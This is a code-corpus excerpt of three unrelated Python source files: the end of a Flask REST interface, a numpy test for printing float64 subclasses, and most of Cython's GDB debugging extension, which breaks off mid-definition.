    """Serve a generated (output) image from the session's output directory."""
    return send_from_directory(session['img_output_dir'], filename)
@API.errorhandler(500)
def internal_server_error(e):
    """Return a JSON 500 response.

    The exception object itself is not JSON-serializable, so jsonify(error=e)
    would fail inside the error handler; serialize its message instead.
    """
    return jsonify(ok=False, error=str(e), code=500), 500
@API.errorhandler(404)
def not_found_error(e):
    """Return a JSON 404 response.

    str(e) because werkzeug's HTTPException is not JSON-serializable.
    """
    return jsonify(ok=False, error=str(e), code=404), 404
| merantix/picasso | picasso/interfaces/rest.py | Python | epl-1.0 | 6,191 |
# -*- coding: utf-8 -*-
""" Test printing of scalar types.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import TestCase, run_module_suite, assert_
class A(object):
    # Plain Python base class; combined with np.float64 in the classes below.
    pass
class B(A, np.float64):
    # Python class listed before np.float64 in the bases.
    pass
class C(B):
    # Second-level subclass of the mixed A/np.float64 class.
    pass
class D(C, B):
    # Diamond inheritance over the mixed hierarchy.
    pass
class B0(np.float64, A):
    # np.float64 listed first in the bases (reverse order of B).
    pass
class C0(B0):
    # Subclass of the float64-first mixed class.
    pass
class TestInherit(TestCase):
    """str() of np.float64 subclasses must render the stored value."""

    def test_init(self):
        # Hierarchy with the Python class first in the bases.
        for cls, expected in ((B, '1.0'), (C, '2.0'), (D, '3.0')):
            assert_(str(cls(float(expected))) == expected)

    def test_init2(self):
        # Hierarchy with np.float64 first in the bases.
        for cls, expected in ((B0, '1.0'), (C0, '2.0')):
            assert_(str(cls(float(expected))) == expected)
if __name__ == "__main__":
run_module_suite()
| mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/numpy/core/tests/test_scalarinherit.py | Python | mit | 771 |
"""
GDB extension that adds Cython support.
"""
from __future__ import print_function
try:
input = raw_input
except NameError:
pass
import sys
import textwrap
import traceback
import functools
import itertools
import collections
import gdb
try: # python 2
UNICODE = unicode
BYTES = str
except NameError: # python 3
UNICODE = str
BYTES = bytes
try:
from lxml import etree
have_lxml = True
except ImportError:
have_lxml = False
try:
# Python 2.5
from xml.etree import cElementTree as etree
except ImportError:
try:
# Python 2.5
from xml.etree import ElementTree as etree
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree
except ImportError:
# normal ElementTree install
import elementtree.ElementTree as etree
try:
import pygments.lexers
import pygments.formatters
except ImportError:
pygments = None
sys.stderr.write("Install pygments for colorized source code.\n")
if hasattr(gdb, 'string_to_argv'):
from gdb import string_to_argv
else:
from shlex import split as string_to_argv
from Cython.Debugger import libpython
# C or Python type
CObject = 'CObject'
PythonObject = 'PythonObject'
_data_types = dict(CObject=CObject, PythonObject=PythonObject)
_filesystemencoding = sys.getfilesystemencoding() or 'UTF-8'
# decorators
def dont_suppress_errors(function):
    """Print a traceback for any escaping exception, then re-raise it.

    readline tends to swallow exceptions raised from completion hooks,
    so make sure they are at least visible.
    """
    @functools.wraps(function)
    def reraising_wrapper(*call_args, **call_kwargs):
        try:
            return function(*call_args, **call_kwargs)
        except Exception:
            traceback.print_exc()
            raise
    return reraising_wrapper
def default_selected_gdb_frame(err=True):
    """Decorator factory: default the ``frame`` argument to gdb's
    currently selected frame.

    With ``err`` true, frames without a function name are rejected.
    """
    def decorator(function):
        @functools.wraps(function)
        def with_default_frame(self, frame=None, *args, **kwargs):
            try:
                frame = frame or gdb.selected_frame()
            except RuntimeError:
                raise gdb.GdbError("No frame is currently selected.")
            if err and frame.name() is None:
                raise NoFunctionNameInFrameError()
            return function(self, frame, *args, **kwargs)
        return with_default_frame
    return decorator
def require_cython_frame(function):
    """Decorator: require that the selected frame maps to a known
    Cython function before running the command."""
    @functools.wraps(function)
    @require_running_program
    def checked(self, *args, **kwargs):
        frame = kwargs.get('frame') or gdb.selected_frame()
        if self.is_cython_function(frame):
            return function(self, *args, **kwargs)
        raise gdb.GdbError('Selected frame does not correspond with a '
                           'Cython function we know about.')
    return checked
def dispatch_on_frame(c_command, python_command=None):
    """Decorator factory: run the wrapped command for Cython frames,
    or dispatch to the matching Python/C gdb command otherwise."""
    def decorator(function):
        @functools.wraps(function)
        def dispatcher(self, *args, **kwargs):
            in_cython = self.is_cython_function()
            in_python = self.is_python_function()
            if in_cython or (in_python and not python_command):
                function(self, *args, **kwargs)
            elif in_python:
                gdb.execute(python_command)
            elif self.is_relevant_function():
                gdb.execute(c_command)
            else:
                raise gdb.GdbError("Not a function cygdb knows about. "
                                   "Use the normal GDB commands instead.")
        return dispatcher
    return decorator
def require_running_program(function):
    """Decorator: fail with a GdbError unless the inferior is running
    (i.e. a frame can be selected)."""
    @functools.wraps(function)
    def checked(*args, **kwargs):
        try:
            gdb.selected_frame()
        except RuntimeError:
            raise gdb.GdbError("No frame is currently selected.")
        return function(*args, **kwargs)
    return checked
def gdb_function_value_to_unicode(function):
    """Decorator: convert a gdb.Value first argument into a Python string."""
    @functools.wraps(function)
    def converting(self, string, *args, **kwargs):
        if isinstance(string, gdb.Value):
            string = string.string()
        return function(self, string, *args, **kwargs)
    return converting
# Classes that represent the debug information
# Don't rename the parameters of these classes, they come directly from the XML
class CythonModule(object):
    """Debug information for one Cython module.

    Parameter names match the attributes of the debug-info XML; don't
    rename them.
    """
    def __init__(self, module_name, filename, c_filename):
        self.name = module_name
        self.filename = filename
        self.c_filename = c_filename
        self.functions = {}
        self.globals = {}
        # Cython line number -> smallest corresponding C line number
        self.lineno_cy2c = {}
        # C line number -> Cython line number
        self.lineno_c2cy = {}
class CythonVariable(object):
    """A Cython variable as described by the debug-info XML.

    Parameter names match the XML attributes; don't rename them.
    """
    def __init__(self, name, cname, qualified_name, type, lineno):
        # the XML stores line numbers as strings
        self.lineno = int(lineno)
        self.name = name
        self.cname = cname
        self.qualified_name = qualified_name
        self.type = type
class CythonFunction(CythonVariable):
    """A Cython function or method, plus its module, locals and arguments.

    Parameter names match the debug-info XML attributes.
    """
    def __init__(self, module, name, cname, pf_cname, qualified_name,
                 lineno, type=CObject, is_initmodule_function="False"):
        super(CythonFunction, self).__init__(name, cname, qualified_name,
                                             type, lineno)
        self.module = module
        self.pf_cname = pf_cname
        # the XML serializes booleans as the strings "True"/"False"
        self.is_initmodule_function = is_initmodule_function == "True"
        self.locals = {}
        self.arguments = []
        self.step_into_functions = set()
# General purpose classes
class CythonBase(object):
    """Mixin with frame-inspection helpers shared by all cygdb commands.

    Relies on ``self.cy`` (the CyCy command object) for the mappings that
    'cy import' builds from the debug-info XML.
    """

    @default_selected_gdb_frame(err=False)
    def is_cython_function(self, frame):
        # Cython frames are recognized purely by their registered C symbol.
        return frame.name() in self.cy.functions_by_cname

    @default_selected_gdb_frame(err=False)
    def is_python_function(self, frame):
        """
        Tells if a frame is associated with a Python function.
        If we can't read the Python frame information, don't regard it as such.
        """
        if frame.name() == 'PyEval_EvalFrameEx':
            pyframe = libpython.Frame(frame).get_pyop()
            return pyframe and not pyframe.is_optimized_out()
        return False

    @default_selected_gdb_frame()
    def get_c_function_name(self, frame):
        # C symbol name of the (selected) frame.
        return frame.name()

    @default_selected_gdb_frame()
    def get_c_lineno(self, frame):
        # Current C source line of the frame.
        return frame.find_sal().line

    @default_selected_gdb_frame()
    def get_cython_function(self, frame):
        # CythonFunction for this frame; raises for non-Cython frames.
        result = self.cy.functions_by_cname.get(frame.name())
        if result is None:
            raise NoCythonFunctionInFrameError()
        return result

    @default_selected_gdb_frame()
    def get_cython_lineno(self, frame):
        """
        Get the current Cython line number. Returns 0 if there is no
        correspondence between the C and Cython code.
        """
        cyfunc = self.get_cython_function(frame)
        return cyfunc.module.lineno_c2cy.get(self.get_c_lineno(frame), 0)

    @default_selected_gdb_frame()
    def get_source_desc(self, frame):
        # Pick the Cython, Python or C source view (and pygments lexer)
        # matching the frame type; returns (SourceFileDescriptor, lineno).
        filename = lineno = lexer = None
        if self.is_cython_function(frame):
            filename = self.get_cython_function(frame).module.filename
            lineno = self.get_cython_lineno(frame)
            if pygments:
                lexer = pygments.lexers.CythonLexer(stripall=False)
        elif self.is_python_function(frame):
            pyframeobject = libpython.Frame(frame).get_pyop()
            if not pyframeobject:
                raise gdb.GdbError(
                    'Unable to read information on python frame')
            filename = pyframeobject.filename()
            lineno = pyframeobject.current_line_num()
            if pygments:
                lexer = pygments.lexers.PythonLexer(stripall=False)
        else:
            symbol_and_line_obj = frame.find_sal()
            if not symbol_and_line_obj or not symbol_and_line_obj.symtab:
                filename = None
                lineno = 0
            else:
                filename = symbol_and_line_obj.symtab.fullname()
                lineno = symbol_and_line_obj.line
                if pygments:
                    lexer = pygments.lexers.CLexer(stripall=False)
        return SourceFileDescriptor(filename, lexer), lineno

    @default_selected_gdb_frame()
    def get_source_line(self, frame):
        # Single rendered source line at the frame's current position.
        source_desc, lineno = self.get_source_desc()
        return source_desc.get_source(lineno)

    @default_selected_gdb_frame()
    def is_relevant_function(self, frame):
        """
        returns whether we care about a frame on the user-level when debugging
        Cython code
        """
        name = frame.name()
        older_frame = frame.older()
        if self.is_cython_function(frame) or self.is_python_function(frame):
            return True
        elif older_frame and self.is_cython_function(older_frame):
            # check for direct C function call from a Cython function
            cython_func = self.get_cython_function(older_frame)
            return name in cython_func.step_into_functions
        return False

    @default_selected_gdb_frame(err=False)
    def print_stackframe(self, frame, index, is_c=False):
        """
        Print a C, Cython or Python stack frame and the line of source code
        if available.
        """
        # do this to prevent the require_cython_frame decorator from
        # raising GdbError when calling self.cy.cy_cvalue.invoke()
        selected_frame = gdb.selected_frame()
        frame.select()
        try:
            source_desc, lineno = self.get_source_desc(frame)
        except NoFunctionNameInFrameError:
            print('#%-2d Unknown Frame (compile with -g)' % index)
            return
        if not is_c and self.is_python_function(frame):
            pyframe = libpython.Frame(frame).get_pyop()
            if pyframe is None or pyframe.is_optimized_out():
                # print this python function as a C function
                return self.print_stackframe(frame, index, is_c=True)
            func_name = pyframe.co_name
            func_cname = 'PyEval_EvalFrameEx'
            func_args = []
        elif self.is_cython_function(frame):
            cyfunc = self.get_cython_function(frame)
            f = lambda arg: self.cy.cy_cvalue.invoke(arg, frame=frame)
            func_name = cyfunc.name
            func_cname = cyfunc.cname
            func_args = []  # [(arg, f(arg)) for arg in cyfunc.arguments]
        else:
            source_desc, lineno = self.get_source_desc(frame)
            func_name = frame.name()
            func_cname = func_name
            func_args = []
        try:
            gdb_value = gdb.parse_and_eval(func_cname)
        except RuntimeError:
            func_address = 0
        else:
            func_address = gdb_value.address
            if not isinstance(func_address, int):
                # Seriously? Why is the address not an int?
                if not isinstance(func_address, (str, bytes)):
                    func_address = str(func_address)
                func_address = int(func_address.split()[0], 0)
        a = ', '.join('%s=%s' % (name, val) for name, val in func_args)
        sys.stdout.write('#%-2d 0x%016x in %s(%s)' % (index, func_address, func_name, a))
        if source_desc.filename is not None:
            sys.stdout.write(' at %s:%s' % (source_desc.filename, lineno))
        sys.stdout.write('\n')
        try:
            sys.stdout.write(' ' + source_desc.get_source(lineno))
        except gdb.GdbError:
            pass
        # restore the frame selection changed above
        selected_frame.select()

    def get_remote_cython_globals_dict(self):
        # __pyx_m is the Cython-generated module object in the inferior.
        m = gdb.parse_and_eval('__pyx_m')
        try:
            PyModuleObject = gdb.lookup_type('PyModuleObject')
        except RuntimeError:
            raise gdb.GdbError(textwrap.dedent("""\
                Unable to lookup type PyModuleObject, did you compile python
                with debugging support (-g)?"""))
        m = m.cast(PyModuleObject.pointer())
        return m['md_dict']

    def get_cython_globals_dict(self):
        """
        Get the Cython globals dict where the remote names are turned into
        local strings.
        """
        remote_dict = self.get_remote_cython_globals_dict()
        pyobject_dict = libpython.PyObjectPtr.from_pyobject_ptr(remote_dict)
        result = {}
        seen = set()
        for k, v in pyobject_dict.items():
            result[k.proxyval(seen)] = v
        return result

    def print_gdb_value(self, name, value, max_name_length=None, prefix=''):
        # Omit the C type when a python pretty-printer will render the value.
        if libpython.pretty_printer_lookup(value):
            typename = ''
        else:
            typename = '(%s) ' % (value.type,)
        if max_name_length is None:
            print('%s%s = %s%s' % (prefix, name, typename, value))
        else:
            print('%s%-*s = %s%s' % (prefix, max_name_length, name, typename, value))

    def is_initialized(self, cython_func, local_name):
        # Whether a local has been assigned by the current Cython line.
        cyvar = cython_func.locals[local_name]
        cur_lineno = self.get_cython_lineno()
        if '->' in cyvar.cname:
            # Closed over free variable
            if cur_lineno > cython_func.lineno:
                if cyvar.type == PythonObject:
                    # non-NULL pointer means the cell is filled in
                    return int(gdb.parse_and_eval(cyvar.cname))
                return True
            return False
        return cur_lineno > cyvar.lineno
class SourceFileDescriptor(object):
def __init__(self, filename, lexer, formatter=None):
self.filename = filename
self.lexer = lexer
self.formatter = formatter
def valid(self):
return self.filename is not None
def lex(self, code):
if pygments and self.lexer and parameters.colorize_code:
bg = parameters.terminal_background.value
if self.formatter is None:
formatter = pygments.formatters.TerminalFormatter(bg=bg)
else:
formatter = self.formatter
return pygments.highlight(code, self.lexer, formatter)
return code
def _get_source(self, start, stop, lex_source, mark_line, lex_entire):
with open(self.filename) as f:
# to provide "correct" colouring, the entire code needs to be
# lexed. However, this makes a lot of things terribly slow, so
# we decide not to. Besides, it's unlikely to matter.
if lex_source and lex_entire:
f = self.lex(f.read()).splitlines()
slice = itertools.islice(f, start - 1, stop - 1)
for idx, line in enumerate(slice):
if start + idx == mark_line:
prefix = '>'
else:
prefix = ' '
if lex_source and not lex_entire:
line = self.lex(line)
yield '%s %4d %s' % (prefix, start + idx, line.rstrip())
def get_source(self, start, stop=None, lex_source=True, mark_line=0,
lex_entire=False):
exc = gdb.GdbError('Unable to retrieve source code')
if not self.filename:
raise exc
start = max(start, 1)
if stop is None:
stop = start + 1
try:
return '\n'.join(
self._get_source(start, stop, lex_source, mark_line, lex_entire))
except IOError:
raise exc
# Errors
class CyGDBError(gdb.GdbError):
    """
    Base class for Cython-command related errors
    """
    def __init__(self, *args):
        # Fall back to the subclass's class-level `msg` when no args given.
        args = args or (self.msg,)
        super(CyGDBError, self).__init__(*args)
class NoCythonFunctionInFrameError(CyGDBError):
    """
    raised when the user requests the current cython function, which is
    unavailable
    """
    # default message used by CyGDBError.__init__
    msg = "Current function is a function cygdb doesn't know about"
class NoFunctionNameInFrameError(NoCythonFunctionInFrameError):
    """
    raised when the name of the C function could not be determined
    in the current C stack frame
    """
    # default message used by CyGDBError.__init__
    msg = ('C function name could not be determined in the current C stack '
           'frame')
# Parameters
class CythonParameter(gdb.Parameter):
    """
    Base class for cython parameters
    """
    def __init__(self, name, command_class, parameter_class, default=None):
        # gdb shows these strings for 'help set/show <name>'; reuse the
        # subclass docstring.
        self.show_doc = self.set_doc = self.__class__.__doc__
        super(CythonParameter, self).__init__(name, command_class,
                                              parameter_class)
        if default is not None:
            self.value = default

    def __bool__(self):
        return bool(self.value)

    __nonzero__ = __bool__  # Python 2
class CompleteUnqualifiedFunctionNames(CythonParameter):
    """
    Have 'cy break' complete unqualified function or method names.
    """
    # Boolean gdb parameter 'cy_complete_unqualified'; the docstring above
    # doubles as its gdb help text (see CythonParameter.__init__).
class ColorizeSourceCode(CythonParameter):
    """
    Tell cygdb whether to colorize source code.
    """
    # Boolean gdb parameter 'cy_colorize_code'; docstring doubles as help.
class TerminalBackground(CythonParameter):
    """
    Tell cygdb about the user's terminal background (light or dark).
    """
    # String gdb parameter 'cy_terminal_background_color'; used to pick the
    # pygments terminal formatter's palette.
class CythonParameters(object):
    """
    Simple container class that might get more functionality in the distant
    future (mostly to remind us that we're dealing with parameters).
    """
    def __init__(self):
        # 'set/show cy_complete_unqualified' (default on)
        self.complete_unqualified = CompleteUnqualifiedFunctionNames(
            'cy_complete_unqualified',
            gdb.COMMAND_BREAKPOINTS,
            gdb.PARAM_BOOLEAN,
            True)
        # 'set/show cy_colorize_code' (default on)
        self.colorize_code = ColorizeSourceCode(
            'cy_colorize_code',
            gdb.COMMAND_FILES,
            gdb.PARAM_BOOLEAN,
            True)
        # 'set/show cy_terminal_background_color' (default "dark")
        self.terminal_background = TerminalBackground(
            'cy_terminal_background_color',
            gdb.COMMAND_FILES,
            gdb.PARAM_STRING,
            "dark")
# Global container for the cy_* gdb parameters, consulted throughout cygdb.
parameters = CythonParameters()
# Commands
class CythonCommand(gdb.Command, CythonBase):
    """
    Base class for Cython commands
    """

    command_class = gdb.COMMAND_NONE

    @classmethod
    def _register(cls, clsname, args, kwargs):
        # Only pass a completer class to gdb.Command if the subclass set one.
        if not hasattr(cls, 'completer_class'):
            return cls(clsname, cls.command_class, *args, **kwargs)
        else:
            return cls(clsname, cls.command_class, cls.completer_class,
                       *args, **kwargs)

    @classmethod
    def register(cls, *args, **kwargs):
        # Also register under the alias (e.g. 'cy backtrace'), if any.
        alias = getattr(cls, 'alias', None)
        if alias:
            cls._register(cls.alias, args, kwargs)
        return cls._register(cls.name, args, kwargs)
class CyCy(CythonCommand):
    """
    Invoke a Cython command. Available commands are:
        cy import
        cy break
        cy step
        cy next
        cy run
        cy cont
        cy finish
        cy up
        cy down
        cy select
        cy bt / cy backtrace
        cy list
        cy print
        cy set
        cy locals
        cy globals
        cy exec
    """

    name = 'cy'
    command_class = gdb.COMMAND_NONE
    completer_class = gdb.COMPLETE_COMMAND

    def __init__(self, name, command_class, completer_class):
        # keep the signature 2.5 compatible (i.e. do not use f(*a, k=v)
        super(CythonCommand, self).__init__(name, command_class,
                                            completer_class, prefix=True)

        # Instantiate and register every subcommand; each gets a back
        # reference to this object via its .cy attribute.
        commands = dict(
            # GDB commands
            import_ = CyImport.register(),
            break_ = CyBreak.register(),
            step = CyStep.register(),
            next = CyNext.register(),
            run = CyRun.register(),
            cont = CyCont.register(),
            finish = CyFinish.register(),
            up = CyUp.register(),
            down = CyDown.register(),
            select = CySelect.register(),
            bt = CyBacktrace.register(),
            list = CyList.register(),
            print_ = CyPrint.register(),
            locals = CyLocals.register(),
            globals = CyGlobals.register(),
            exec_ = libpython.FixGdbCommand('cy exec', '-cy-exec'),
            _exec = CyExec.register(),
            set = CySet.register(),

            # GDB functions
            cy_cname = CyCName('cy_cname'),
            cy_cvalue = CyCValue('cy_cvalue'),
            cy_lineno = CyLine('cy_lineno'),
            cy_eval = CyEval('cy_eval'),
        )

        for command_name, command in commands.items():
            command.cy = self
            setattr(self, command_name, command)

        self.cy = self

        # Cython module namespace
        self.cython_namespace = {}

        # maps (unique) qualified function names (e.g.
        # cythonmodule.ClassName.method_name) to the CythonFunction object
        self.functions_by_qualified_name = {}

        # unique cnames of Cython functions
        self.functions_by_cname = {}

        # map function names like method_name to a list of all such
        # CythonFunction objects
        self.functions_by_name = collections.defaultdict(list)
class CyImport(CythonCommand):
    """
    Import debug information outputted by the Cython compiler
    Example: cy import FILE...
    """

    name = 'cy import'
    command_class = gdb.COMMAND_STATUS
    completer_class = gdb.COMPLETE_FILENAME

    def invoke(self, args, from_tty):
        """Parse each debug-info XML file and register its modules,
        functions, globals and line-number mappings on self.cy."""
        if isinstance(args, BYTES):
            args = args.decode(_filesystemencoding)
        for arg in string_to_argv(args):
            try:
                # 'with' closes the handle even if parsing fails (the
                # original leaked the open file). IOError included for
                # Python 2, where open() raises IOError, not OSError.
                with open(arg) as f:
                    t = etree.parse(f)
            except (IOError, OSError) as e:
                # Report the file that actually failed (arg), not the whole
                # argument string (args) as the original did.
                raise gdb.GdbError('Unable to open file %r: %s' % (arg, e.args[1]))

            for module in t.getroot():
                cython_module = CythonModule(**module.attrib)
                self.cy.cython_namespace[cython_module.name] = cython_module

                for variable in module.find('Globals'):
                    d = variable.attrib
                    cython_module.globals[d['name']] = CythonVariable(**d)

                for function in module.find('Functions'):
                    cython_function = CythonFunction(module=cython_module,
                                                     **function.attrib)

                    # update the global function mappings
                    name = cython_function.name
                    qname = cython_function.qualified_name

                    self.cy.functions_by_name[name].append(cython_function)
                    self.cy.functions_by_qualified_name[
                        cython_function.qualified_name] = cython_function
                    self.cy.functions_by_cname[
                        cython_function.cname] = cython_function

                    cython_module.functions[qname] = cython_function

                    for local in function.find('Locals'):
                        d = local.attrib
                        cython_function.locals[d['name']] = CythonVariable(**d)

                    for step_into_func in function.find('StepIntoFunctions'):
                        d = step_into_func.attrib
                        cython_function.step_into_functions.add(d['name'])

                    cython_function.arguments.extend(
                        funcarg.tag for funcarg in function.find('Arguments'))

                for marker in module.find('LineNumberMapping'):
                    cython_lineno = int(marker.attrib['cython_lineno'])
                    c_linenos = list(map(int, marker.attrib['c_linenos'].split()))
                    # map the Cython line to its first generated C line,
                    # and every C line back to the Cython line
                    cython_module.lineno_cy2c[cython_lineno] = min(c_linenos)
                    for c_lineno in c_linenos:
                        cython_module.lineno_c2cy[c_lineno] = cython_lineno
class CyBreak(CythonCommand):
    """
    Set a breakpoint for Cython code using Cython qualified name notation, e.g.:
        cy break cython_modulename.ClassName.method_name...
    or normal notation:
        cy break function_or_method_name...
    or for a line number:
        cy break cython_module:lineno...
    Set a Python breakpoint:
        Break on any function or method named 'func' in module 'modname'
            cy break -p modname.func...
        Break on any function or method named 'func'
            cy break -p func...
    """

    name = 'cy break'
    command_class = gdb.COMMAND_BREAKPOINTS

    def _break_pyx(self, name):
        # 'module:lineno' (module optional) -> break on the first C line
        # generated for that Cython line.
        modulename, _, lineno = name.partition(':')
        lineno = int(lineno)
        if modulename:
            cython_module = self.cy.cython_namespace[modulename]
        else:
            cython_module = self.get_cython_function().module
        if lineno in cython_module.lineno_cy2c:
            c_lineno = cython_module.lineno_cy2c[lineno]
            breakpoint = '%s:%s' % (cython_module.c_filename, c_lineno)
            gdb.execute('break ' + breakpoint)
        else:
            raise gdb.GdbError("Not a valid line number. "
                               "Does it contain actual code?")

    def _break_funcname(self, funcname):
        # Prefer an exact qualified-name match; otherwise offer all functions
        # with that unqualified name, falling back to a plain gdb breakpoint.
        func = self.cy.functions_by_qualified_name.get(funcname)

        if func and func.is_initmodule_function:
            func = None

        break_funcs = [func]

        if not func:
            funcs = self.cy.functions_by_name.get(funcname) or []
            funcs = [f for f in funcs if not f.is_initmodule_function]
            if not funcs:
                gdb.execute('break ' + funcname)
                return

            if len(funcs) > 1:
                # multiple functions, let the user pick one
                print('There are multiple such functions:')
                for idx, func in enumerate(funcs):
                    print('%3d) %s' % (idx, func.qualified_name))

                while True:
                    try:
                        result = input(
                            "Select a function, press 'a' for all "
                            "functions or press 'q' or '^D' to quit: ")
                    except EOFError:
                        return
                    else:
                        if result.lower() == 'q':
                            return
                        elif result.lower() == 'a':
                            break_funcs = funcs
                            break
                        elif (result.isdigit() and
                                0 <= int(result) < len(funcs)):
                            break_funcs = [funcs[int(result)]]
                            break
                        else:
                            print('Not understood...')
            else:
                break_funcs = [funcs[0]]

        for func in break_funcs:
            gdb.execute('break %s' % func.cname)
            if func.pf_cname:
                # also break on the Python wrapper, when one exists
                gdb.execute('break %s' % func.pf_cname)

    def invoke(self, function_names, from_tty):
        if isinstance(function_names, BYTES):
            function_names = function_names.decode(_filesystemencoding)
        argv = string_to_argv(function_names)
        if function_names.startswith('-p'):
            # '-p' prefix: set Python breakpoints via py-break
            argv = argv[1:]
            python_breakpoints = True
        else:
            python_breakpoints = False

        for funcname in argv:
            if python_breakpoints:
                gdb.execute('py-break %s' % funcname)
            elif ':' in funcname:
                self._break_pyx(funcname)
            else:
                self._break_funcname(funcname)

    @dont_suppress_errors
    def complete(self, text, word):
        # Filter init-module functions (breakpoints can be set using
        # modulename:linenumber).
        names = [n for n, L in self.cy.functions_by_name.items()
                 if any(not f.is_initmodule_function for f in L)]
        qnames = [n for n, f in self.cy.functions_by_qualified_name.items()
                  if not f.is_initmodule_function]

        if parameters.complete_unqualified:
            all_names = itertools.chain(qnames, names)
        else:
            all_names = qnames

        words = text.strip().split()
        if not words or '.' not in words[-1]:
            # complete unqualified
            seen = set(text[:-len(word)].split())
            return [n for n in all_names
                    if n.startswith(word) and n not in seen]

        # complete qualified name
        lastword = words[-1]
        compl = [n for n in qnames if n.startswith(lastword)]

        if len(lastword) > len(word):
            # readline sees something (e.g. a '.') as a word boundary, so don't
            # "recomplete" this prefix
            strip_prefix_length = len(lastword) - len(word)
            compl = [n[strip_prefix_length:] for n in compl]

        return compl
class CythonInfo(CythonBase, libpython.PythonInfo):
    """
    Implementation of the interface dictated by libpython.LanguageInfo.
    """

    def lineno(self, frame):
        # Take care of the Python and Cython levels. We need to care for both
        # as we can't simply dispatch to 'py-step', since that would work for
        # stepping through Python code, but it would not step back into Cython-
        # related code. The C level should be dispatched to the 'step' command.
        if self.is_cython_function(frame):
            return self.get_cython_lineno(frame)
        return super(CythonInfo, self).lineno(frame)

    def get_source_line(self, frame):
        try:
            line = super(CythonInfo, self).get_source_line(frame)
        except gdb.GdbError:
            return None
        else:
            return line.strip() or None

    def exc_info(self, frame):
        # BUG FIX: the original tested the bound method object
        # (`if self.is_python_function:`), which is always truthy, so the
        # Python-level exc_info was fetched even for non-Python frames.
        # Actually call the predicate with the frame.
        if self.is_python_function(frame):
            return super(CythonInfo, self).exc_info(frame)

    def runtime_break_functions(self):
        if self.is_cython_function():
            return self.get_cython_function().step_into_functions
        return ()

    def static_break_functions(self):
        result = ['PyEval_EvalFrameEx']
        result.extend(self.cy.functions_by_cname)
        return result
class CythonExecutionControlCommand(CythonCommand,
                                    libpython.ExecutionControlCommandBase):
    # Shared base for the stepping/continuing commands below.

    @classmethod
    def register(cls):
        # Execution-control commands are constructed with the global
        # cython_info language-info object instead of a completer.
        return cls(cls.name, cython_info)
class CyStep(CythonExecutionControlCommand, libpython.PythonStepperMixin):
"Step through Cython, Python or C code."
name = 'cy -step'
stepinto = True
def invoke(self, args, from_tty):
if self.is_python_function():
self.python_step(self.stepinto)
elif not self.is_cython_function():
if self.stepinto:
command = 'step'
else:
command = 'next'
self.finish_executing(gdb.execute(command, to_string=True))
else:
self.step(stepinto=self.stepinto)
class CyNext(CyStep):
"Step-over Cython, Python or C code."
name = 'cy -next'
stepinto = False
class CyRun(CythonExecutionControlCommand):
    """
    Run a Cython program. This is like the 'run' command, except that it
    displays Cython or Python source lines as well
    """

    name = 'cy run'
    # delegate directly to the base class implementation
    invoke = CythonExecutionControlCommand.run
class CyCont(CythonExecutionControlCommand):
    """
    Continue a Cython program. This is like the 'run' command, except that it
    displays Cython or Python source lines as well.
    """

    name = 'cy cont'
    # delegate directly to the base class implementation
    invoke = CythonExecutionControlCommand.cont
class CyFinish(CythonExecutionControlCommand):
    """
    Execute until the function returns.
    """

    name = 'cy finish'
    # delegate directly to the base class implementation
    invoke = CythonExecutionControlCommand.finish
class CyUp(CythonCommand):
    """
    Go up a Cython, Python or relevant C frame.
    """

    name = 'cy up'
    _command = 'up'

    def invoke(self, *args):
        try:
            # keep moving until a frame the user cares about is reached
            gdb.execute(self._command, to_string=True)
            while not self.is_relevant_function(gdb.selected_frame()):
                gdb.execute(self._command, to_string=True)
        except RuntimeError as e:
            raise gdb.GdbError(*e.args)

        # compute this frame's depth from the top to label the printout
        frame = gdb.selected_frame()
        index = 0
        while frame:
            frame = frame.older()
            index += 1

        self.print_stackframe(index=index - 1)
class CyDown(CyUp):
    """
    Go down a Cython, Python or relevant C frame.
    """

    name = 'cy down'
    # same walking logic as CyUp, just in the other direction
    _command = 'down'
class CySelect(CythonCommand):
    """
    Select a frame. Use frame numbers as listed in `cy backtrace`.
    This command is useful because `cy backtrace` prints a reversed backtrace.
    """

    name = 'cy select'

    def invoke(self, stackno, from_tty):
        try:
            stackno = int(stackno)
        except ValueError:
            raise gdb.GdbError("Not a valid number: %r" % (stackno,))

        # walk to the newest frame so the total stack depth can be measured
        frame = gdb.selected_frame()
        while frame.newer():
            frame = frame.newer()

        stackdepth = libpython.stackdepth(frame)

        try:
            # cy backtrace numbers frames oldest-first, gdb newest-first;
            # translate between the two numbering schemes.
            gdb.execute('select %d' % (stackdepth - stackno - 1,))
        except RuntimeError as e:
            raise gdb.GdbError(*e.args)
class CyBacktrace(CythonCommand):
    'Print the Cython stack'

    name = 'cy bt'
    alias = 'cy backtrace'
    command_class = gdb.COMMAND_STACK
    completer_class = gdb.COMPLETE_NONE

    @require_running_program
    def invoke(self, args, from_tty):
        # get the first frame
        frame = gdb.selected_frame()
        while frame.older():
            frame = frame.older()

        # '-a' prints every frame, not only Cython/Python/relevant-C ones
        print_all = args == '-a'

        index = 0
        while frame:
            try:
                is_relevant = self.is_relevant_function(frame)
            except CyGDBError:
                is_relevant = False

            if print_all or is_relevant:
                self.print_stackframe(frame, index)

            index += 1
            frame = frame.newer()
class CyList(CythonCommand):
    """
    List Cython source code. To disable or customize colouring see the cy_*
    parameters.
    """

    name = 'cy list'
    command_class = gdb.COMMAND_FILES
    completer_class = gdb.COMPLETE_NONE

    # @dispatch_on_frame(c_command='list')
    def invoke(self, _, from_tty):
        sd, lineno = self.get_source_desc()
        # show 5 lines of context either side of the current line
        source = sd.get_source(lineno - 5, lineno + 5, mark_line=lineno,
                               lex_entire=True)
        print(source)
class CyPrint(CythonCommand):
    """
    Print a Cython variable using 'cy-print x' or 'cy-print module.function.x'
    """

    name = 'cy print'
    command_class = gdb.COMMAND_DATA

    def invoke(self, name, from_tty, max_name_length=None):
        if self.is_python_function():
            return gdb.execute('py-print ' + name)
        elif self.is_cython_function():
            # leading '*'s dereference the looked-up value that many times
            value = self.cy.cy_cvalue.invoke(name.lstrip('*'))
            for c in name:
                if c == '*':
                    value = value.dereference()
                else:
                    break
            self.print_gdb_value(name, value, max_name_length)
        else:
            gdb.execute('print ' + name)

    def complete(self):
        # NOTE(review): gdb invokes completers as complete(text, word); this
        # signature takes neither — confirm how/whether it is called.
        if self.is_cython_function():
            f = self.get_cython_function()
            # NOTE(review): CythonFunction defines no 'globals' attribute
            # (modules do) — possibly intended as f.module.globals; verify.
            return list(itertools.chain(f.locals, f.globals))
        else:
            return []
def sortkey(item):
